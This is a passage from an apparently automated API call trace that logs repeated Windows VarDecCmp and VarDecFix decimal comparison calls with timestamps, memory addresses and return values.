0x2 [0333.549] VarDecCmp (pdecLeft=0x1b62c7c8, pdecRight=0x1b62c7b8) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c7a8, pdecRight=0x1b62c798) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c928, pdecRight=0x1b62c918) returned 0x2 [0333.549] VarDecCmp (pdecLeft=0x1b62c9f8, pdecRight=0x1b62c9e8) returned 0x2 [0333.549] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c3c8, pdecRight=0x1b62c3b8) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c3a8, pdecRight=0x1b62c398) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c3c8, pdecRight=0x1b62c3b8) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c3a8, pdecRight=0x1b62c398) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c3c8, pdecRight=0x1b62c3b8) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c3a8, pdecRight=0x1b62c398) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c3c8, pdecRight=0x1b62c3b8) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c3a8, pdecRight=0x1b62c398) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x2 [0333.549] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x2 [0333.549] VarDecCmp (pdecLeft=0x1b62c598, pdecRight=0x1b62c588) returned 0x2 [0333.549] VarDecCmp (pdecLeft=0x1b62c558, pdecRight=0x1b62c548) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c538, pdecRight=0x1b62c528) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.549] VarDecCmp (pdecLeft=0x1b62c818, pdecRight=0x1b62c808) returned 0x2 [0333.549] VarDecCmp (pdecLeft=0x1b62c6f8, pdecRight=0x1b62c6e8) returned 0x2 [0333.549] VarDecFix (in: pdecIn=0x1b62c6d8, pdecResult=0x1b62c660 | out: pdecResult=0x1b62c660) returned 0x0 [0333.549] VarDecCmp (pdecLeft=0x1b62c6c8, pdecRight=0x1b62c6b8) returned 0x1 [0333.550] VarDecCmp (pdecLeft=0x1b62c6f0, pdecRight=0x1b62c6e0) returned 0x2 [0333.550] VarDecFix (in: pdecIn=0x1b62c6d0, pdecResult=0x1b62c640 | out: pdecResult=0x1b62c640) returned 0x0 [0333.550] VarDecCmp (pdecLeft=0x1b62c6c0, pdecRight=0x1b62c6b0) returned 0x1 [0333.550] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.550] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.550] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.550] VarDecCmp (pdecLeft=0x1b62c898, pdecRight=0x1b62c888) returned 0x2 [0333.550] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.550] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.550] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.550] VarDecCmp (pdecLeft=0x1b62c708, pdecRight=0x1b62c6f8) returned 0x1 [0333.550] VarDecCmp (pdecLeft=0x1b62c6e8, pdecRight=0x1b62c6d8) returned 0x1 [0333.550] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.550] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.550] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.550] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.550] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.551] VarDecCmp (pdecLeft=0x1b62c3b8, pdecRight=0x1b62c3a8) returned 0x0 [0333.551] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x2 [0333.551] VarDecCmp (pdecLeft=0x1b62c540, pdecRight=0x1b62c530) returned 0x2 [0333.551] VarDecCmp (pdecLeft=0x1b62c520, pdecRight=0x1b62c510) returned 0x0 [0333.551] VarDecCmp (pdecLeft=0x1b62c3b8, pdecRight=0x1b62c3a8) returned 0x0 [0333.551] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x2 [0333.551] VarDecCmp (pdecLeft=0x1b62c540, pdecRight=0x1b62c530) returned 0x2 [0333.551] VarDecCmp (pdecLeft=0x1b62c520, pdecRight=0x1b62c510) returned 0x0 [0333.551] VarDecCmp (pdecLeft=0x1b62c818, pdecRight=0x1b62c808) returned 0x2 [0333.551] VarDecCmp (pdecLeft=0x1b62c6f8, pdecRight=0x1b62c6e8) returned 0x2 [0333.551] VarDecFix (in: pdecIn=0x1b62c6d8, pdecResult=0x1b62c660 | out: pdecResult=0x1b62c660) returned 0x0 [0333.551] VarDecCmp (pdecLeft=0x1b62c6c8, pdecRight=0x1b62c6b8) returned 0x1 [0333.551] VarDecCmp (pdecLeft=0x1b62c6f0, pdecRight=0x1b62c6e0) returned 0x2 [0333.551] VarDecFix (in: pdecIn=0x1b62c6d0, pdecResult=0x1b62c640 | out: pdecResult=0x1b62c640) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c6c0, pdecRight=0x1b62c6b0) returned 0x1 [0333.552] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c898, pdecRight=0x1b62c888) returned 0x2 [0333.552] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.552] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.552] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.552] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.552] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.552] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.552] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.552] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.553] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.553] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.553] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.553] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.553] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.553] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c708, pdecRight=0x1b62c6f8) returned 0x1 [0333.553] VarDecCmp (pdecLeft=0x1b62c6e8, pdecRight=0x1b62c6d8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.554] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.554] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.554] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.554] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.554] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.554] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.554] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.554] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.554] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.554] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.555] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.555] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.555] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.555] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.555] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.555] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.556] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.556] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.556] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.556] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.556] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.556] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.556] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c318, pdecRight=0x1b62c308) returned 0x0 [0333.557] VarDecCmp (pdecLeft=0x1b62c2f8, pdecRight=0x1b62c2e8) returned 0x2 [0333.557] VarDecCmp (pdecLeft=0x1b62c4a0, pdecRight=0x1b62c490) returned 0x2 [0333.557] VarDecCmp (pdecLeft=0x1b62c480, pdecRight=0x1b62c470) returned 0x0 [0333.557] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.557] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.557] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.557] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.557] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.557] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.557] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.557] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.557] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.558] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.558] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.558] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c708, pdecRight=0x1b62c6f8) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c6e8, pdecRight=0x1b62c6d8) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.558] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.558] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.558] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.558] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.559] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.559] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.559] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.559] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.559] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.559] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.559] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.559] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.560] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.560] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.560] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.560] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.560] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.560] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.560] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.560] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.561] VarDecCmp (pdecLeft=0x1b62c978, pdecRight=0x1b62c968) returned 0x2 [0333.561] VarDecCmp (pdecLeft=0x1b62c858, pdecRight=0x1b62c848) returned 0x2 [0333.561] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.561] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x1 [0333.562] VarDecCmp (pdecLeft=0x1b62c850, pdecRight=0x1b62c840) returned 0x2 [0333.562] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.562] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x1 [0333.562] VarDecCmp (pdecLeft=0x1b62c800, pdecRight=0x1b62c7f0) returned 0x2 [0333.562] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.562] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.562] VarDecCmp (pdecLeft=0x1b62c9f8, pdecRight=0x1b62c9e8) returned 0x2 [0333.562] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.562] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.562] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.562] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.562] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.562] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.562] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.562] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.562] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.562] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.562] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.562] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.562] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.564] VarDecCmp (pdecLeft=0x1b62c758, pdecRight=0x1b62c748) returned 0x0 [0333.564] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x2 [0333.564] VarDecCmp (pdecLeft=0x1b62c8e0, pdecRight=0x1b62c8d0) returned 0x2 [0333.564] VarDecCmp (pdecLeft=0x1b62c8c0, pdecRight=0x1b62c8b0) returned 0x0 [0333.564] VarDecCmp (pdecLeft=0x1b62c758, pdecRight=0x1b62c748) returned 0x0 [0333.564] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x2 [0333.564] VarDecCmp (pdecLeft=0x1b62c8e0, pdecRight=0x1b62c8d0) returned 0x2 [0333.564] VarDecCmp (pdecLeft=0x1b62c8c0, pdecRight=0x1b62c8b0) returned 0x0 [0333.565] VarDecCmp (pdecLeft=0x1b62c758, 